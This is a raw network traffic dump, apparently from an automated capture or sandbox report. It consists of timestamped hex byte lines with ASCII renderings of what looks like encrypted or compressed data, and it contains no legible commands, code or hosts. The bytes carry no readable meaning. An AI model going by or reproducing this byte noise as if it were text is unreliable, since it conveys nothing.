                                                                          Data Ascii: s-$XCT}%E<j"uujL/N(ufB)@y`qS2\>-10?&{;>fJOs),!@x//SI*BOD5<d6+O+ddo1%Mdz^;pOTL'Q1:3z/doq
                                                                          2021-10-13 14:18:11 UTC45INData Raw: 38 da 6b 2b 19 c4 2e 51 09 a5 63 3c 64 c9 9a 16 6b 44 02 67 49 5e 88 13 a5 24 64 b9 62 26 04 04 c8 b1 47 17 42 10 a8 3a 40 07 24 c4 9a 20 17 8c 9f a5 e6 68 38 5d 0c 22 37 c1 b3 0a 4b cf 7e 91 68 a5 6c e7 85 5f c6 4a f6 00 84 4a ea 25 58 ac b6 c6 ec 59 b8 b8 83 77 10 47 bb e1 6c 5c d6 c1 1c 8f fe 58 9e 97 4b 87 ee 85 b2 eb f1 7d 1f 8d 32 f3 dd e7 ec 6f 64 7a 63 47 6a f5 ee 86 dc df d6 c6 71 b7 68 04 3f d7 94 d5 cd cc 84 bb 62 ed ca d4 12 6d ef dc 2c 68 e7 df 31 bb e0 e8 49 56 7c 02 9d df a2 09 19 f6 12 01 a9 ee b8 3a e7 a2 99 bf ac 7d a7 aa 52 8a e6 72 1c 7b 26 a1 2a ba 7e 1f 04 c9 a4 ca 8d a9 c5 08 d5 60 08 bc 17 e3 37 2a f5 8a 9e b3 d1 a8 62 67 81 1b 0a 5a 78 15 a6 d3 b1 55 45 84 4c c6 ce 23 f9 67 8f 8c 58 8d da 57 93 f2 d7 43 4d 66 d1 8d 8f 2e c8 0a c4
                                                                          Data Ascii: 8k+.Qc<dkDgI^$db&GB:@$ h8]"7K~hl_JJ%XYwGl\XK}2odzcGjqh?bm,h1IV|:}Rr{&*~`7*bgZxUEL#gXWCMf.
                                                                          2021-10-13 14:18:11 UTC47INData Raw: a9 23 93 d7 fb 45 f3 25 df 27 c4 fc 0a c0 ed 0e 89 66 0f 2e f3 94 6a df 4a ce ce 32 12 1a f7 45 5c 59 74 76 90 48 ce b1 fc 96 b3 8a 73 6b bc 40 8b 0b f7 24 5f e1 a6 d3 be d1 40 cf 8d f6 73 79 b0 8d 0e e7 15 79 39 02 31 ab 17 af 20 7d 54 52 53 05 b4 a9 38 d1 1c c9 c9 51 dd 6c 59 4d 2a 38 e6 cd 93 34 af 98 7f c9 29 ab f6 a3 c1 ce 29 8c 28 2c fa fe 24 52 42 ee ea 9d e9 0e 7b 01 72 ad 2d cb c4 b2 01 97 43 8b 81 88 a3 08 ed f4 4f 4e 07 0e 01 1a 02 3c c8 21 e5 63 b4 e3 2c a6 83 65 62 69 3a 15 b0 3b 05 07 2b c4 4d e4 ca bb a3 99 da 42 f5 96 cd 7d 79 e4 ec 3b 9e fd b3 ae 29 5e 5d 3c 18 2f bd 4a cc 78 15 ac 99 35 5a 04 af bf 21 f3 b5 1f b9 9d 3a 35 24 8b e7 98 e8 e0 4e 1d 84 ec 68 a4 dd 86 bd 03 45 a5 24 58 19 03 99 d4 be 5c 06 87 e3 ba b8 7e 2b f8 27 a8 9d 5b d7
                                                                          Data Ascii: #E%'f.jJ2E\YtvHsk@$_@syy91 }TRS8QlYM*84))(,$RB{r-CON<!c,ebi:;+MB}y;)^]</Jx5Z!:5$NhE$X\~+'[
                                                                          2021-10-13 14:18:11 UTC48INData Raw: 99 4e 5c 89 7c 30 35 6c a9 1b 87 2b 04 ce a8 5a f8 45 61 8c 06 3e 89 09 e5 b4 74 1c 9d 9c 9c 60 78 34 7f 42 69 26 cc f4 0f 4b cf 72 d3 cf b4 66 c5 1b 59 ee f7 db 36 f1 7b e0 34 58 97 35 d6 e0 42 9c 94 ba 7f 38 ce ab ed 77 7a 83 f4 16 a3 ce 3a b0 84 41 ee db 8a a3 e0 f1 77 58 09 33 f3 dd 99 cb 7c 6e 13 41 54 66 9c e8 8a cd dd 67 ef 56 9f 59 15 32 f5 b8 db e5 f2 eb 91 6a 33 cc c3 0b 77 56 d8 25 79 e5 e6 09 87 8b 11 a5 a1 8a a0 bb f7 93 7a 9d fd 01 05 89 fe e6 39 ed 7a b1 35 a0 6a 7b 91 c2 9b ea 69 27 d0 da 5f df 2a da 0f 13 15 d8 5c 9d b8 de 0d 34 5f 36 da e3 73 41 2d df 80 8d b6 f8 1a 61 67 87 68 10 5b 73 b6 ae d0 ae 7d de 85 4c cc cb 8d 3d 93 88 ab d9 8d da 5c a8 5e d1 43 d9 4e 44 8d ba 24 a7 ae d3 c8 03 a0 1f 2f de ca da 53 d1 07 be 56 82 75 dc 4b ff 2d
                                                                          Data Ascii: N\|05l+ZEa>t`x4Bi&KrfY6{4X5B8wz:AwX3|nATfgVY2j3wV%yz9z5j{i'_*\4_6sA-agh[s}L=\^CND$/SVuK-
                                                                          2021-10-13 14:18:11 UTC49INData Raw: 7e d3 96 6c b6 65 e4 f6 34 03 04 38 56 34 56 77 66 96 27 e8 b3 fa 90 51 67 5b c2 a5 40 8d 65 c6 16 5c e7 eb d7 af c5 71 d8 8c e7 0a d1 a8 a5 c2 ec 13 0d 38 9a ef a1 2d a0 dc 6b 4c 7a 00 1d db f8 10 c9 14 15 de 3a 31 6c 59 46 dc 36 c3 e7 a4 c8 af 3f da e0 1f ab f6 a9 1f cc 2f 2b 05 8e 86 f8 02 45 40 ee ec b7 ba 94 79 7f 4b b7 21 cb c2 dd c7 8c 73 8b 5f ce 87 20 da 9e 4f 44 1b 39 29 97 29 36 16 20 f0 4f a4 f9 3a b0 1f 74 62 7e 30 ab a1 33 07 11 b7 d4 4b fd ec 27 ae d3 c0 5a 73 87 cb 67 74 48 fe 3d de eb 2f bf 71 43 4b b1 7a 93 a3 5c 5a 63 15 cd bf 22 c6 11 81 b7 29 e5 2f 26 e6 81 31 25 90 82 e3 87 e2 99 14 0c 82 f9 bb bc 64 bf 8c 1c 4b b9 b4 61 27 1c 96 c8 fc 4d 06 f2 bf 96 b9 7a 09 e2 2c bf f4 59 8f 84 b8 30 c3 df 76 c8 5f c4 f9 85 4e b5 2d 30 ee 32 0b 7f
                                                                          Data Ascii: ~le48V4Vwf'Qg[@e\q8-kLz:1lYF6?/+E@yK!s_ OD9))6 O:tb~03K'ZsgtH=/qCKz\Zc")/&1%dKa'Mz,Y0v_N-02
                                                                          2021-10-13 14:18:11 UTC50INData Raw: 1b 9b d5 3a cc 66 4a 39 b7 34 d2 0c e2 73 0a e1 32 3c da 32 56 5c b2 be 31 72 48 a9 24 ef 4b d8 97 04 7c 41 04 84 0a 23 01 ca df e8 7a 41 73 81 ba a9 2d e3 6b fa 65 de 87 72 f7 2c bb e0 06 19 a4 54 b6 c4 10 fc 91 88 cf f4 32 1b 9d 08 2e 19 55 57 2e f2 bf 25 8f c8 d6 bb 68 c9 2d 24 8d a4 0d 1b 1f 42 49 58 64 3a 2a 79 e0 44 ac 5b d2 fc f9 41 dd 34 d6 f9 d7 d4 2b df 2d 0d 83 73 2e c6 d1 96 60 f1 dd e6 f6 38 01 14 38 41 73 42 75 66 9a 65 c9 b7 f1 4b e2 71 73 7e b7 44 a3 9f ec 14 56 f2 f2 c2 b6 f9 df cc 8d e1 28 09 b1 8d 0e c5 d8 06 15 09 5e 63 3e b8 28 6e 54 73 28 9a b4 af 1a e1 08 cb cf 38 08 6b 48 40 d9 31 c5 ee 79 5d ad 92 73 f7 00 ad e1 73 0c dc 3c f9 3c 14 f8 fa 0c 54 48 c6 2e b6 ba 0b 53 c6 59 b4 29 da c9 f5 3a 97 43 87 48 0b d9 20 da f5 5c 57 1b 35 2f
                                                                          Data Ascii: :fJ94s2<2V\1rH$K|A#zAs-ker,T2.UW.%h-$BIXd:*yD[A4+-s.`88AsBufeKqs~DV(^c>(nTs(8kH@1y]ss<<TH.SY):CH \W5/
                                                                          2021-10-13 14:18:11 UTC51INData Raw: a4 56 7a db 59 71 35 98 09 16 cd 69 cd 16 f4 8d 34 8d 71 af 38 2f 33 5d 02 31 d0 bb e0 06 8a 59 56 78 c4 5b 42 c6 ed 61 b5 30 37 a1 32 96 6c 74 31 dc 5b 5a aa cc 6d fe a0 69 a2 a2 51 76 a2 22 28 be 05 ad b0 44 b2 68 59 d0 d9 aa e4 ee 03 c5 fa 59 93 0b 04 bc 9e 41 56 a2 d9 6b 2d 76 48 2f 51 0f 43 da 3c 64 1b 88 1e 7a 59 16 99 48 55 80 6d 37 37 54 b6 74 0f 2b 04 c8 d5 51 e9 52 66 97 1a 69 f2 08 e5 b2 67 07 89 8a bf 11 78 18 7c 66 30 33 f6 94 9f 46 dc 7d fe e1 a0 73 e4 6a 59 c2 f5 f0 17 54 53 fd 3e 4d 81 39 d6 e9 4a 6b fa be 78 2e c2 a0 f2 63 71 fd d5 0b a9 36 2a 90 9d 42 9b 2b 85 bc ed f3 7e 70 b4 35 e8 25 f7 cd 7b 45 ab 5b 56 6f f3 ee 8e d1 29 b8 cc 7f b1 6c 7a fb ff ab dc ff f4 f6 82 65 ed dd d7 1b 9e 81 e7 24 40 c3 f5 1f bf ec f7 49 5b a2 1c bd ed 6b 08
                                                                          Data Ascii: VzYq5i4q8/3]1YVx[Ba072lt1[ZmiQv"(DhYYAVk-vH/QC<dzYHUm77Tt+QRfigx|f03F}sjYTS>M9Jkx.cq6*B+~p5%{E[Vo)lze$@I[k
                                                                          2021-10-13 14:18:11 UTC52INData Raw: 31 50 4d f5 9a 33 72 44 eb e5 e9 40 0f 56 0b 59 69 ed 90 2f 01 3b e2 e7 e2 69 4f ab 8a 94 bb 2c ff 61 27 6c df 81 72 95 32 bb ee 16 31 7c 56 b6 c2 37 93 b0 c4 cf f0 24 13 f2 b8 34 29 56 5a c3 e3 b1 33 f0 c5 ee 68 1b 73 2d 35 89 bf 7e 12 0c 47 3d 68 1a a9 20 51 33 54 a9 23 ed f8 d1 61 f5 23 de ee be e4 22 f7 e7 1d 85 5d 12 5c d1 9c 7b df 69 3c f5 32 14 7f 9b 44 5b 79 01 74 90 48 d5 de ec 97 40 79 60 75 b7 46 a3 d1 ef 14 5a 8e 48 d2 be db 6a dd 8d e7 1b d0 b7 9c 02 c5 cf 04 15 05 5e 1d 3e b8 28 09 40 7a 00 1d a7 a7 02 c1 0f c1 41 89 0c b6 71 41 f4 36 e8 f4 a3 25 a7 ba 93 e1 11 ad e5 a0 6c ec 2d f2 02 3e f0 eb 06 54 45 c6 32 b5 ba 0b 14 2f 58 b4 29 da c8 cc cc f8 67 83 5f 80 97 2a cb fd 20 62 08 26 3f 0b 08 1e cb 22 e3 4f da d5 2e a6 85 bb 68 41 11 37 b0 3f
                                                                          Data Ascii: 1PM3rD@VYi/;iO,a'lr21|V7$4)VZ3hs-5~G=h Q3T#a#"]\{i<2D[ytH@y`uFZHj^>(@zAqA6%l->TE2/X)g_* b&?"O.hA7?
                                                                          2021-10-13 14:18:11 UTC54INData Raw: bc 36 5c 23 6e 13 35 97 00 e3 06 86 ea 15 6d e1 79 59 e3 fc 6d b7 38 6c f7 31 96 60 6a 0f cc 1f 5b a0 18 78 62 a2 85 8b a2 57 63 f5 3e 6c bf 07 a7 a6 de 84 4e 5b d0 bc ba e2 c6 52 c7 fa 5f ea 21 06 bc 98 47 47 a4 b6 7c 2c 76 44 3e 5b 60 4a db 3c 6e f5 42 e0 85 b3 c8 8f 59 45 f5 56 36 24 65 9f 78 1f 20 71 f3 bb 51 e8 2c 27 84 1f 5b dc 19 ed a5 b1 05 84 84 bc fe 70 ba c2 50 5b c9 38 23 5e 5f ea 50 c9 f0 a5 66 fe 93 2b 54 fd f6 0a 89 71 da 34 5e 8e e7 c5 ea 79 92 d1 92 7d 79 fc ba e1 64 71 ec d0 42 a3 c8 2b f6 94 4b 81 5d 89 a3 e6 f6 7b 70 a5 30 f3 db f6 e1 7e 6e 15 41 45 6a f3 3c 8a cd d7 70 e1 73 b7 7b 15 32 ff b1 d6 cd cb f0 a1 65 ed a4 d3 03 60 f5 cb 2d 79 9e 4d 1f b9 ea e4 72 b0 a1 0d be fb eb 35 19 fc 0b 07 ee 66 b9 3a e7 71 90 c1 11 6b 71 b3 4d 97 fc
                                                                          Data Ascii: 6\#n5myYm8l1`j[xbWc>lN[R_!GG|,vD>[`J<nBYEV6$ex qQ,'[pP[8#^_Pf+Tq4^y}ydqB+K]{p0~nAEj<ps{2e`-yMr5f:qkqM
                                                                          2021-10-13 14:18:11 UTC55INData Raw: 18 36 2c 1c e6 c4 71 38 8f 83 bc 85 3f f7 74 db 76 cc 81 63 f9 11 a8 10 1d 35 ad 44 bc d3 ba f0 92 d0 dc e8 28 0a 8f 16 2b d7 5d 7b c0 e1 af 32 35 db c6 b5 04 60 3f 24 96 bc 6a 76 1e 6e 4a 27 a0 a9 2a 73 e0 4d ba 37 fc ec eb 5e 0b 22 f8 f3 af 4a 22 f7 e7 1d 85 69 15 4f d1 87 78 c3 bf e7 da 3b 6c 83 29 45 51 7f 6e 75 82 48 df a3 e5 8e be 72 5f 73 b7 4c a3 ee ec 14 5a f2 ff cc a7 c2 0c cf 9c f5 18 3d b1 a1 1d c5 0e 04 15 05 19 8c 3f b8 28 55 ad 79 00 00 9c 8b 10 c9 14 da cb 27 08 7e 59 56 e6 29 e6 1b a5 18 a3 94 62 e9 7e bc f7 a9 15 d1 09 e1 16 2d eb e8 13 61 be ef c0 a5 ab 05 53 05 5e b4 29 a4 e8 df c7 91 5c a4 4c 94 86 31 c8 eb 40 ba 0b 0a 30 22 c4 37 16 21 fc 59 a6 ed 2c b7 91 7a 7e 97 27 1b bb 1d 1e 03 2b c3 5e e1 e5 a0 ac c7 da 5d fd 89 c3 82 63 f8 e8
                                                                          Data Ascii: 6,q8?tvc5D(+]{25`?$jvnJ'*sM7^"J"iOx;l)EQnuHr_sLZ=?(Uy'~YV)b~-aS^)\L1@0"7!Y,z~'+^]c
                                                                          2021-10-13 14:18:11 UTC56INData Raw: ed 6b ac 2c 4f 0a 22 81 b0 e5 31 ef 5f 5a a6 7d 93 f8 8a 64 d7 8e 24 67 e8 07 38 24 11 bc bb 55 fb f2 36 19 ba ab ee f9 65 ab 15 59 85 01 17 b9 8f 4a 47 b2 ce bd b7 60 5f 24 40 1f 9a 0d a6 0b 06 89 1e 70 54 cc f6 a7 4f 80 67 25 22 17 91 76 0e 2c 17 d9 aa 54 86 8a 70 84 15 4b 31 26 f4 a3 6f 79 a4 97 b4 e9 68 25 64 69 4e 13 c5 dc 86 5b de 69 fb 9f 83 6e ed 92 49 ff d5 fa 04 82 5f 8d 1e 5c 84 3f c1 fd 42 fa ec 93 7d 32 d9 aa f6 b0 62 fc c1 04 b2 df 15 a1 6a b4 7e ec 81 b4 30 f3 72 61 ac 21 e0 e5 55 1c 81 91 cb 52 60 42 c4 ff 8b c7 c4 ab 93 c9 b7 6e 1f 3f d7 93 d6 cd c0 35 93 66 c7 c5 f8 03 21 9c cb 2d 68 ed f7 1f 98 e0 ee 5a 9b a0 0d b8 11 97 09 19 e9 01 0f 81 cc b8 3a ec 67 a9 a9 a0 e9 73 b9 5e e1 ea 63 1e 36 60 5f d5 4f 65 26 48 1f b7 dd f3 5c d5 1a 51 c4
                                                                          Data Ascii: k,O"1_Z}d$g8$U6eYJG`_$@pTOg%"v,TpK1&oyh%diN[inI_\?B}2bj~0ra!UR`Bn?5f!-hZ:gs^c6`_Oe&H\Q
                                                                          2021-10-13 14:18:11 UTC57INData Raw: 71 eb 08 93 b3 1c 19 a2 46 b2 cd 08 1a 8e c4 c9 d2 cf 18 9d 0f 1d 74 5c 57 cc e3 b9 2c cb 20 d5 aa 1d 5b c4 27 87 a8 5b d5 1f 42 45 47 12 a0 02 65 ee 57 af 0d e1 f9 f9 43 dd 7e d4 f9 d7 ca 25 fe c5 10 87 75 00 75 ce 92 6a df 69 bb f6 32 14 1c 38 4d 73 5d 77 66 96 5e e6 9f fa 96 4a 65 5d 2d d5 62 89 0a ea 07 55 f0 f3 c2 ba f9 fb cc 8d e1 11 c5 98 aa 04 ed 19 68 3d 01 31 a9 2e b1 33 75 3d 5e 02 06 b2 be 19 d8 19 a6 e9 3c 1b 6a 48 4e dc 16 c7 e5 a2 5b 85 90 73 e7 17 ba ff c6 08 cf 2f f8 da 22 df d2 3b 45 40 e4 ff bf 92 35 7b 07 50 6a 2f 15 d7 f8 ef a0 43 81 55 95 8d 53 60 f4 4f 4e 01 0e 01 1a 02 3c c8 23 e5 63 b2 d5 2c a6 83 24 50 69 26 37 b0 35 1f bc 2b c5 4d a0 fa bb bf 2a da 4c ef 99 cd 7c 62 ce ef 3b c3 fd b3 ae 77 58 5d 2d 6b 9f bc 4a c6 62 12 d2 b6 21
                                                                          Data Ascii: qFt\W, ['[BEGeWC~%uuji28Ms]wf^Je]-bUh=1.3u=^<jHN[s/";E@5{Pj/CUS`ON<#c,$Pi&75+M*L|b;wX]-kJb!
                                                                          2021-10-13 14:18:11 UTC59INData Raw: 6e 88 a8 4e 66 cb ff 29 be 0d 7b af 7d b6 b2 4a d5 b2 ba e1 c6 55 c5 fa 53 09 54 04 bc 9f 69 65 a3 d9 61 21 67 48 38 87 1c 8b ca 3a 75 c6 b7 20 85 b3 e9 91 60 d3 80 6d 3c 2e ba a1 5c 39 2a 04 c2 93 7f eb 43 76 8e 37 69 00 08 ef 6c 67 10 a6 95 b4 ae 65 34 75 6f 21 37 c7 dc 80 4a cf 02 ff f0 a5 16 ec 94 58 fc fd f6 00 98 59 e2 35 45 b4 3e c7 ea 52 95 fb ec 7d 38 d9 b8 eb 64 67 83 31 15 a3 c2 34 e3 a6 43 83 ea e7 ab e7 e0 71 7a a3 18 6f db f6 eb 56 08 14 47 4f 67 80 d9 8a cd dd aa e6 62 b1 7a 3d 1a fb ab d0 da 47 ec 91 60 ec df da 12 68 96 b5 49 68 ed f3 bd a8 e8 fa 4e 76 6b 0c b8 fd 84 0f 0d d4 28 0b 81 d0 af b7 ea 7c 99 af b3 62 60 b1 48 8c 66 e8 0f 45 db fd c4 4d 7b 1a 3b d6 b6 db 96 a9 d2 0e 73 fd 33 da ef 0b 45 2b df 8a 9f a0 d8 a5 6a 71 ff 7e 94 5a 77
                                                                          Data Ascii: nNf){}JUSTiea!gH8:u `m<.\9*Cv7ilge4uo!7JXY5E>R}8dg14CqzoVGOgbz=G`hIhNvk(|b`HfEM{;s3E+jq~Zw
                                                                          2021-10-13 14:18:11 UTC60INData Raw: 6d 0a 35 2f 74 79 c8 f0 b9 0d 06 c9 d6 a0 33 ef 2d 24 8d bd 74 8e 37 d5 40 54 1c 81 04 7b ea 51 81 c0 fd fd f3 6d 69 23 d4 f3 c2 dc 33 f1 c5 20 81 75 00 4b f9 b8 6a d9 4b f0 08 33 03 17 01 6b 59 73 73 70 b8 66 ce b1 f0 80 be 72 2c 52 a1 54 87 d7 4b 14 5c e1 eb d5 96 ff 1c cf 8b f1 28 ed b0 8d 0e fb 3d 47 66 21 33 af 39 ab 2a 6c 5a 52 57 04 b4 a9 7f e1 1c c9 c9 2f 13 7d 5f 28 d0 34 c3 e3 b5 3c be 96 5b e3 10 ab f0 c6 39 cc 2f f4 15 25 d2 b9 08 45 46 81 c6 b7 ba 0b 7c 16 52 db 38 ca c2 d7 19 c2 30 a3 5d 86 80 33 d3 e5 46 6c 5d 24 39 1c 6d 1e 14 21 e5 58 bc ee 2b c9 a7 67 64 6f 37 3e a1 30 37 05 2a c5 4b 8b dc b9 bf d3 cb 45 c7 d5 c9 7c 64 bb c5 39 c2 fb b4 bf 7e 31 4a 2c 6b 9f 63 5f e3 5a 24 d2 b6 3e 49 0a f4 12 23 f3 b9 3b c8 a6 3a 33 06 4d e7 9f c4 87 a2
                                                                          Data Ascii: m5/ty3-$t7@T{Qmi#3 uKjK3kYsspfr,RTK\(=Gf!39*lZRW/}_(4<[9/%EF|R80]3Fl]$9m!X+gdo7>07*KE|d9~1J,kc_Z$>I#;:3M
                                                                          2021-10-13 14:18:11 UTC61INData Raw: e4 e8 ae c9 d2 10 81 0b 02 d3 b4 43 56 a4 df 7a 20 19 59 2e 51 05 53 ce 19 4c f8 89 1e 70 5f 18 ea f2 4f 80 67 3b 0c 5c b3 74 04 f4 3d d9 aa 46 3f 50 61 95 0e 40 12 86 52 8d bf e8 73 6a a5 e9 6e e2 66 69 30 31 d6 cc be c1 31 87 01 2e b0 49 c5 a3 58 ee f7 e5 0f f1 e3 e2 34 54 89 11 ff ec 53 9f 25 90 7b 12 c1 90 e1 66 30 d8 d0 14 a3 c8 2b bc 50 4b 81 fd 55 a3 e6 e0 d9 71 a5 30 e6 db f6 e1 64 6e 15 46 45 6a f3 ff d9 cd d7 b9 67 72 b7 6e cc 33 ff ab c3 cd ca eb 8b 60 ed cd c1 33 63 80 31 2d 68 ed 73 1f b9 f1 f8 49 58 9a c0 b8 f7 95 09 08 fa 1e 05 7f d7 94 36 e4 6d 9c 91 dc 6a 71 b9 41 90 f9 65 0f 54 dc 43 2b 44 43 0b 38 f5 aa c8 9a b8 c5 1c 45 29 36 f6 f4 1b c0 04 3d 8b 9e b9 c8 d5 4a b4 80 1b 9e 72 a7 bd a6 cb 83 71 45 85 46 cd fc 2b 2d 95 8e 92 44 96 24 57
                                                                          Data Ascii: CVz Y.QSLp_Og;\t=F?Pa@Rsjnfi011.IX4TS%{f0+PKUq0dnFEjgrn3`3c1-hsIX6mjqAeTC+DC8E)6=JrqEF+-D$W
                                                                          2021-10-13 14:18:11 UTC63INData Raw: a9 6d 97 6e de 52 53 05 a0 0a da ea 57 a9 b9 ed fa e6 4f d5 9a d4 f9 d1 45 33 f0 f2 05 a3 93 06 5d d1 0a 7b de 5e ea e9 61 8e 01 2e 5a 56 6c 0f fa 81 4f d1 bf da 03 40 73 73 e2 b7 47 94 05 f3 68 c0 f0 fd cc ae c7 82 de 8a f8 11 d5 2c 9c 03 f2 01 11 89 12 36 b0 2c ae be 6c 55 65 14 10 28 be 17 d6 0b df 53 2f 1c 73 4f 67 0b 36 c3 e5 38 25 a8 8d 64 f7 8d ba f1 b6 07 d8 b3 e3 03 32 e3 da 8c 45 40 ee 70 a4 bd 12 61 11 c6 a5 28 d4 d9 cb 5b 86 44 9e 43 90 1a 31 dd eb 52 64 8a 26 39 1a 9e 27 11 3e fd 69 35 ff 2c a6 1f 74 63 76 39 21 2c 24 18 18 0b e5 b2 e4 fa bb 23 c4 dd 53 ce 80 51 6d 65 cb cd 2d 5e ec b4 b1 54 48 c1 3c 6c 8a 99 6a 46 72 13 d2 2a 25 5d 1f a2 be bf e2 b4 28 c6 be ba 33 0c 93 79 89 e9 90 af 0b 18 f7 b1 b5 d0 8e 0a 03 45 af b4 61 26 1c b0 fe e0 5c
                                                                          Data Ascii: mnRSWOE3]{^a.ZVlO@ssGh,6,lUe(S/sOg68%d2E@pa([DC1Rd&9'>i5,tcv9!,$#SQme-^TH<ljFr*%](3yEa&\
                                                                          2021-10-13 14:18:11 UTC64INData Raw: 51 6d 0f 8d d1 14 3d cb 89 18 15 fc 17 99 42 ed 91 74 3a 2c 77 a2 62 1d 3a 3c 16 b9 51 e9 52 61 95 0f cb 0d 01 dc 7e 65 16 8c 9c db 5e 78 34 7f 7c 32 21 d4 ce b8 fb cd 78 fe e1 b6 7d ff 0e 4b ea f4 e7 04 ed e9 e3 34 54 97 3c b4 8d 52 95 f1 81 7b 29 cd 92 bb 62 71 ea bf a6 a2 c8 21 a8 6b 4a 97 03 89 b2 e3 c8 20 74 a5 36 9c 69 f7 e1 74 7a eb 46 53 94 f2 ee 8e e5 8b bd e0 75 d8 dc 14 32 f5 bf 28 cc dc 15 90 00 fc c9 fa 5e 64 80 cd 42 da ec f7 15 ad 1e ef 4c a0 a3 6d a9 f2 bd 57 1d fc 07 60 33 d7 b8 30 f9 82 98 b8 5e 6b 11 e6 67 8d e8 63 0f 36 f8 5d d5 43 7c 04 09 92 a2 db 9c b9 c7 00 4a cd 21 f2 b2 18 c8 2a 7d 9b 84 a4 f8 e8 66 67 87 b9 85 40 6b 94 fb c5 ab 53 e7 94 56 df cb 7c 3a 93 88 21 53 97 c9 5f a8 ec d3 43 d5 75 d6 9c b3 3d dd 0d c1 dc 22 fe 89 3b cf
                                                                          Data Ascii: Qm=Bt:,wb:<QRa~e^x4|2!x}K4T<R{)bq!kJ t6itzFSu2(^dBLmW`30^kgc6]C|J!*}fg@kSV|:!S_Cu=";
                                                                          2021-10-13 14:18:11 UTC65INData Raw: ff 2a c5 f3 4b f1 4b f3 ed 08 ab 51 06 5d db 34 7b d3 56 30 e5 38 03 1a 38 5b 6a 92 7d e8 27 5e ff 86 ec 85 4b 7a fd c9 b7 44 05 bd fb ce 4f fe e9 df 95 ce 0f cb 9c eb 08 d2 bb 17 2c 87 17 07 13 2b 15 af 3f b2 80 6c 59 6d d6 15 bf be 1c de c8 da c3 2f 17 7d 46 76 2f 45 2c e4 a4 3e bc 9b 62 e5 02 8a e0 ba 3f f6 9d f7 04 2d eb db 1d 65 da fd f9 a4 af 14 6c 1e 29 44 2e cb c8 ce d6 86 52 95 77 07 84 20 dc e2 c2 43 0a 26 38 0e 16 22 3e 82 e3 49 bf d7 76 a6 83 6f e8 56 26 37 b1 26 0d 16 39 d2 c1 db fa bb be fd 69 4c ef 9c e5 26 62 d4 e5 2c 14 70 98 ae 77 5f 4e 23 7d 86 b0 5c d5 61 3b fc b4 34 5c 13 88 be 30 e7 c0 15 e2 9e 3c 20 1c 82 f4 8c c6 e4 8c 1d 82 ff 3b ad f8 ae 8b 10 67 be 0a 66 30 0d b1 cf 60 5c 0a 5b dd 99 af 6c 8f d0 25 a8 9a d1 9f a6 aa 28 c6 98 4e
                                                                          Data Ascii: *KKQ]4{V088[j}'^KzDO,+?lYm/}Fv/E,>b?-el)D.Rw C&8">IvoV&7&9iL&b,pw_N#}\a;4\0< ;gf0`\[l%(N
                                                                          2021-10-13 14:18:11 UTC66INData Raw: 59 a1 d4 e2 cd 1d 35 4e da 0c 28 fd 30 b8 b6 28 49 83 d9 96 64 80 e8 54 38 35 8a c2 bc 2d 66 4c 46 3e 24 f0 1c e2 d4 08 e1 3e 3c d1 31 56 50 b2 4d 32 72 44 ee 36 ee 4b d8 61 2e 59 69 39 eb 22 2b 0c e4 f6 ff 6d 9d be 96 ad 8d 3b 72 6c fa 65 df 92 54 fa 28 ad ff 0b 95 9b 55 b6 c5 82 ed ab d0 e7 4a 28 1b 97 16 15 a5 63 57 ca f1 a9 0d 51 c8 d6 a0 37 5c 3c 2a 90 23 74 88 1f 43 50 77 0b 8a 3c 68 fd db 96 25 fc fc 5b 54 d6 37 fc 49 d1 d9 28 e8 92 82 bc 75 06 5c c7 be 98 d8 41 ec cc 6e ed ef d6 52 48 60 64 71 83 5e f6 34 f8 96 40 62 7c 56 e8 44 8b 0c 83 0d 5d e1 f0 fe af c0 11 e7 dd e3 00 c5 df 94 05 ed 19 3e d1 03 31 af 2e ae 3d 74 84 69 18 17 a0 b9 23 98 0f df d7 e8 08 74 72 0e e5 26 d0 c2 b5 13 be b5 1c c2 13 ab f0 b8 11 d9 a2 f5 04 2d fb e9 2e 54 62 f8 fd ad
                                                                          Data Ascii: Y5N(0(IdT85-fLF>$><1VPM2rD6Ka.Yi9"+m;rleT(UJ(cWQ7\<*#tCPw<h%[T7I(u\AnRH`dq^4@b|VD]>1.=ti#tr&-.Tb
                                                                          2021-10-13 14:18:11 UTC67INData Raw: b8 5e ee 39 cc 78 ac f2 02 73 a6 70 48 39 6d f8 41 e4 b5 0a 5a 84 68 c6 9e a9 7d 68 f0 f1 9e c7 70 0d 09 cd 6a 2c 25 e5 80 22 7b e9 df a8 4b 05 4a d4 23 b2 fd ed 17 91 b4 6a 7c e4 fd c2 d1 37 7c 70 b0 7b 1b 32 97 75 79 0f f5 5e d4 17 0a b5 eb 98 7d 86 89 03 67 e6 07 26 2a 16 a9 a1 4a 7f b2 4f ff a2 ba e2 ff b1 d5 ff 48 8b 9f 24 43 9e 41 56 74 c8 6f 3c 78 da f5 cf 24 9d ca 3a 75 c1 98 1b 6b 42 82 88 4c 5e 8e f9 ec ba 62 a2 72 1f 24 90 e0 51 50 e9 49 58 50 1e 51 0a 20 c1 b2 67 1c 86 84 ba f8 af 27 7b 7e 2f 26 d5 ed 28 94 c0 5d d6 c7 a5 6c e7 87 57 c6 c5 f6 00 88 87 e2 32 74 84 78 db ec 53 95 fb 92 7d 3e c8 ba e1 76 73 ec d0 02 a1 c8 2b b3 95 4b 81 e7 88 a3 e7 fb 4b 73 a5 1c f3 db f6 fb 7e 6e 04 45 46 42 87 ff 8b c7 d2 ae 36 e9 bc 69 11 1a 8b ab d6 c7 dc 71
                                                                          Data Ascii: ^9xspH9mAZh}hpj,%"{KJ#j|7|p{2uy^}g&*JOH$CAVto<x$:ukBL^br$QPIXPQ g'{~/&(]lW2txS}>vs+KKs~nEFB6iq
                                                                          2021-10-13 14:18:11 UTC68INData Raw: 9c 76 9a db 4c 0d 4c b2 d4 30 18 77 45 50 f3 1f d3 08 c0 7b 10 6c 1f 14 8b 30 45 50 84 2a 18 72 4e c7 f1 ea 42 c3 43 03 d7 de 1b a4 0b 29 06 f3 e3 fe 6b 41 a4 0f 0b 9d 04 ed 6a fa 6f cf 85 6c fa 0b ad f0 34 0b a5 55 bc d5 29 ed 87 ab e8 fb 28 11 8c 00 24 2c 33 7f cb f0 b5 34 ea a7 fd ab 1b 79 26 23 84 b8 70 06 a8 2d 6f 55 1a a3 39 7e c2 43 a8 25 f6 ec fe 2a e3 22 d4 f3 dd d1 28 29 f8 2b ab 42 06 5d db 85 61 f1 6f e4 f6 34 18 38 11 45 5b 79 ab 66 96 62 ce b1 bb 8a 40 73 73 7e a6 40 8b 0a ec 14 6b e0 fa d3 89 d0 1e cf 98 e7 00 c3 aa 8d 04 ec 08 37 13 03 50 af 3f b8 b2 7d 52 6b 73 67 b5 af 1a c4 17 a6 3a 3f 1b 66 4a 41 f6 